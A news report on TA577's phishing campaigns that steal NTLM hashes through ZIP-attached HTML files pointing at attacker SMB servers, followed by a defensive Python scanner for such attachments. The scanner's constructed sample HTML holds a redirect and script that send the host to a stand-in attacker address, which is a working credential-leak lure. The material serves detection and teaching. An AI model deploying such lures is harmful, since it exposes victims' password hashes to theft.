
admin, 8 March 2024 08:17:06, 10 views, 2,573 words, 8 min 34 s read

The threat actor known as TA577 has been observed using ZIP archive attachments in phishing emails with an aim to steal NT LAN Manager (NTLM) hashes.


The new attack chain "can be used for sensitive information gathering purposes and to enable follow-on activity," enterprise security firm Proofpoint said in a Monday report.


At least two campaigns taking advantage of this approach were observed on February 26 and 27, 2024, the company added. The phishing waves disseminated thousands of messages and targeted hundreds of organizations across the world.


The messages themselves appeared as responses to previous emails, a known technique called thread hijacking, in a bid to increase the likelihood of the attacks' success.


The ZIP attachments – which are the most common delivery mechanism – come with an HTML file that's designed to contact an actor-controlled Server Message Block (SMB) server.


"TA577's objective is to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes based on characteristics of the attack chain and tools used," the company said. The stolen hashes could then be used in pass-the-hash (PtH) type attacks.



This means that adversaries who are in possession of a password hash do not need the underlying password to authenticate a session, ultimately enabling them to move through a network and gain unauthorized access to valuable data.


TA577, which overlaps with an activity cluster tracked by Trend Micro as Water Curupira, is one of the most sophisticated cybercrime groups. It has been linked to the distribution of malware families like QakBot and PikaBot in the past.


"The rate at which TA577 adopts and distributes new tactics, techniques, and procedures (TTPs) suggests the threat actor likely has the time, resources, and experience to rapidly iterate and test new delivery methods," Proofpoint said.


It also described the threat actor as acutely aware of shifts in the cyber threat landscape, quickly adapting and refining its tradecraft and delivery methods to bypass detection and drop a variety of payloads. Organizations are strongly advised to block outbound SMB to prevent exploitation.
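The article describes the attachment only at a high level: a ZIP carrying an HTML file that, when opened, makes the host reach out to an actor-controlled SMB server, and it recommends blocking outbound SMB. The scanner below is an added example, not code from the article or from Proofpoint, showing what a mail gateway or sandbox can check statically before a user ever opens the file: it walks the HTML members of a ZIP, extracts UNC paths and `file:` URLs that name a remote host, classifies each host, and returns a verdict. The sample attachment, the `invoice.html` name, and the address `203.0.113.7` (a documentation address standing in for an external, actor-controlled server) are all constructed for the example.

```python
"""Static scan of ZIP e-mail attachments for HTML that points the host at an SMB share.

Added example: not code from the article or from Proofpoint. It flags the indicator
the article describes (an HTML file inside a ZIP that references a remote SMB server)
so the message can be quarantined before a user opens it. All samples are constructed;
203.0.113.7 is a documentation address used as a stand-in for an external server.
"""
import io
import ipaddress
import re
import zipfile

# References that make a Windows host open an SMB connection when the HTML is rendered:
#   \\host\share\file        plain UNC path (appears as \\\\host\\share inside JavaScript strings)
#   file://host/share/file   file: URL naming a remote host (file:///C:/... is local and ignored)
UNC_RE = re.compile(r"\\{2,4}([A-Za-z0-9.\-]+)\\+([^\s\"'<>]+)")
FILE_URL_RE = re.compile(
    r"file:(?://|\\{2})(?![/\\])([A-Za-z0-9.\-]+)[/\\]+([^\s\"'<>]+)", re.IGNORECASE)
MAX_MEMBER_BYTES = 5_000_000  # do not inflate oversized members (zip-bomb guard)

# Explicit internal ranges (RFC 1918, loopback, link-local); anything else that parses
# as an IP literal is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "::1/128", "fe80::/10")]


def classify_host(host):
    """'internal' for RFC 1918/loopback/link-local literals, 'external' for any other IP,
    'hostname' when only DNS or reputation data could decide."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    return "internal" if any(ip in net for net in INTERNAL_NETS) else "external"


def find_smb_references(html):
    """Return every UNC / file: reference in an HTML document, with its host classified."""
    refs = []
    for regex, kind in ((UNC_RE, "unc"), (FILE_URL_RE, "file-url")):
        for match in regex.finditer(html):
            host, path = match.group(1), match.group(2)
            refs.append({"kind": kind, "host": host, "path": path,
                         "host_class": classify_host(host)})
    return refs


def scan_zip_attachment(data):
    """Walk the .htm/.html members of a ZIP given as bytes and collect SMB references."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".htm", ".html")):
                continue
            if info.file_size > MAX_MEMBER_BYTES:
                findings.append({"member": info.filename, "kind": "oversized",
                                 "host": "", "path": "", "host_class": "hostname"})
                continue
            html = zf.read(info).decode("utf-8", errors="replace")
            for ref in find_smb_references(html):
                findings.append(dict(member=info.filename, **ref))
    return findings


def verdict(findings):
    """'block' if any reference targets a public IP; 'review' for hostnames or internal
    targets (a lookalike of an internal server still deserves an analyst's eyes); else 'clean'."""
    if any(f["host_class"] == "external" for f in findings):
        return "block"
    return "review" if findings else "clean"


# Constructed sample mimicking the attachment the article describes.
SAMPLE_HTML = r"""<html><body>
<p>Please find the invoice attached.</p>
<a href="\\fileserver01\public\invoice.docx">internal share (looks benign)</a>
<meta http-equiv="refresh" content="0; url=file://203.0.113.7/share/invoice">
<script>window.location = "\\\\203.0.113.7\\share\\invoice";</script>
</body></html>"""


def build_sample_zip():
    """Build the constructed ZIP attachment in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.html", SAMPLE_HTML)
        zf.writestr("readme.txt", "plain-text members are not scanned")
    return buf.getvalue()


if __name__ == "__main__":
    results = scan_zip_attachment(build_sample_zip())
    for f in results:
        print(f"{f['member']}: {f['kind']} -> {f['host']} ({f['host_class']}) {f['path']}")
    print("verdict:", verdict(results))
```

The scan is deliberately static and offline: it never resolves or contacts the referenced host, so it is safe to run inside a mail pipeline. Hostname targets get a "review" rather than a "clean" verdict because a reference to what looks like an internal server can still be a lookalike; the egress control the article recommends (blocking outbound SMB at the perimeter) remains the backstop for anything the pattern match misses.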




